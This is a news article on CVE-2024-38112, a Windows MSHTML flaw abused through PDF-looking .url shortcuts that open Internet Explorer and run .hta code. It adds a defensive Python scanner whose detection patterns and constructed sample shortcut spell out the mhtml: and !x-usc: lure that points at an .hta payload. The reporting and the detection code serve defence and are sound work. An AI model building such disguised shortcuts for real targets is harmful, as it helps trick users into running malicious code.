Major Windows Security Hole Went Unpatched by Microsoft for Over a YEAR...


Windows Exploit

Hackers have been targeting Windows 10 and 11 users with malware for over a year, but a fix has finally arrived in the latest Windows update released on July 9th.

This vulnerability, exploited by malicious code since at least January 2023, was reported to Microsoft by researchers. It was fixed on Tuesday as part of Microsoft’s monthly patch release, tracked as CVE-2024-38112. The flaw, residing in the MSHTML engine of Windows, had a severity rating of 7.0 out of 10.

Security firm Check Point discovered the attack code, which used “novel tricks” to lure Windows users into executing remote code. One method involved a file named Books_A0UJKO.pdf.url, which appeared as a PDF in Windows but was actually a .url file designed to open an application via a link.

Internet Explorer Continues to Haunt Windows...

When viewed in Windows, these files looked like PDFs, but they opened a link that called msedge.exe (the Edge browser). The link included prefixes such as mhtml: and !x-usc:, a trick threat actors have long used to open applications such as MS Word. Instead of opening in Edge, the link would open in Internet Explorer (IE), which is outdated and less secure.

Internet Explorer, Microsoft's infamously insecure browser, has been discontinued for years, yet previously unknown vulnerabilities in it are still occasionally discovered. The point is that once a hacker has Internet Explorer open and can direct it to a URL, they can choose from a wide variety of methods to install software, execute code, or destroy data.

IE would prompt the user with a dialog box to open the file, and if the user clicked “open,” a second dialog box appeared, vaguely warning about opening content on the Windows device. Clicking “allow” would cause IE to load a file ending in .hta, running embedded code.

Haifei Li, the Check Point researcher who discovered the vulnerability, summarized the attack methods: the first technique used the “mhtml” trick to call IE instead of the more secure Chrome/Edge. The second technique tricked users into thinking they were opening a PDF while actually executing a dangerous .hta application. Together, the two tricks were meant to make victims believe they were simply opening a PDF.

Check Point’s report includes cryptographic hashes for six malicious .url files used in the campaign, which Windows users can use to check if they’ve been targeted.
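For defenders who want to hunt for this pattern on their own file shares or mail quarantines, the following script is an added example (not code from the article, Check Point, or Microsoft). It parses Windows Internet Shortcut (.url) files and flags the indicators the article describes: a decoy double extension such as .pdf.url, a URL= target that starts with mhtml:, the !x-usc: marker, and a target ending in .hta. It also includes a SHA-256 lookup against a known-bad set so the hashes from the Check Point report can be dropped in; the set here is an empty placeholder because the article does not reproduce the hashes. The sample shortcut contents, the example.invalid hostnames, and all function names are constructed for this example.

```python
import hashlib
import re
import sys
from pathlib import Path, PurePath

# Indicator patterns drawn from the behaviour described in the article.
MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
XUSC_MARKER = re.compile(r"!x-usc:", re.IGNORECASE)
HTA_TARGET = re.compile(r"\.hta(\W|$)", re.IGNORECASE)
DECOY_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.url$", re.IGNORECASE)

# Placeholder: fill with the SHA-256 values published in the Check Point report.
KNOWN_BAD_SHA256 = set()


def parse_url_file(text):
    """Return the URL= value from the [InternetShortcut] section, or None.

    Hand-rolled rather than configparser so odd lines in real .url files
    (extra CLSID sections, missing '=') do not abort the scan.
    """
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, val = line.partition("=")
            if key.strip().lower() == "url":
                return val.strip()
    return None


def assess_url_shortcut(filename, text):
    """Return the list of indicator names triggered; an empty list means clean."""
    hits = []
    if DECOY_DOUBLE_EXT.search(PurePath(filename).name):
        hits.append("decoy-double-extension")
    url = parse_url_file(text)
    if url is None:
        return hits
    if MHTML_PREFIX.match(url):
        hits.append("mhtml-prefix")
    if XUSC_MARKER.search(url):
        hits.append("x-usc-marker")
    if HTA_TARGET.search(url):
        hits.append("hta-target")
    return hits


def sha256_of_bytes(data):
    """Hex SHA-256 of raw file bytes, for comparison with published IoCs."""
    return hashlib.sha256(data).hexdigest()


def is_known_bad(data, known_hashes=KNOWN_BAD_SHA256):
    """True when the file's SHA-256 appears in the supplied IoC set."""
    return sha256_of_bytes(data) in known_hashes


def scan_directory(root):
    """Walk a tree and map each suspicious .url path to its indicator list."""
    findings = {}
    for path in Path(root).rglob("*.url"):
        try:
            data = path.read_bytes()
        except OSError:
            continue
        text = data.decode("utf-8", errors="replace")
        hits = assess_url_shortcut(path.name, text)
        if is_known_bad(data):
            hits.append("known-bad-hash")
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples, not the real campaign files. The first mimics the
# shape the article describes: a PDF-looking name whose URL= line forces the
# mhtml: handler and points at an .hta. The second is an ordinary shortcut.
SUSPICIOUS_NAME = "Books_A0UJKO.pdf.url"  # filename reported in the article
SUSPICIOUS_TEXT = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://example.invalid/decoy!x-usc:http://example.invalid/p.hta\r\n"
    "IconIndex=13\r\n"
)
BENIGN_NAME = "release-notes.url"
BENIGN_TEXT = "[InternetShortcut]\r\nURL=https://example.invalid/notes\r\n"

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for found_path, found_hits in scan_directory(root).items():
        print(f"{found_path}: {', '.join(found_hits)}")
```

Run it with a directory argument (for example a mail attachment quarantine or a user's Downloads folder) and it lists each .url file that matches at least one indicator. A hit on the double extension alone is a weak signal; the combination of a decoy extension, an mhtml: prefix and an .hta target is the pattern worth escalating.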

____
Author: Stephen Hannan
New York Newsroom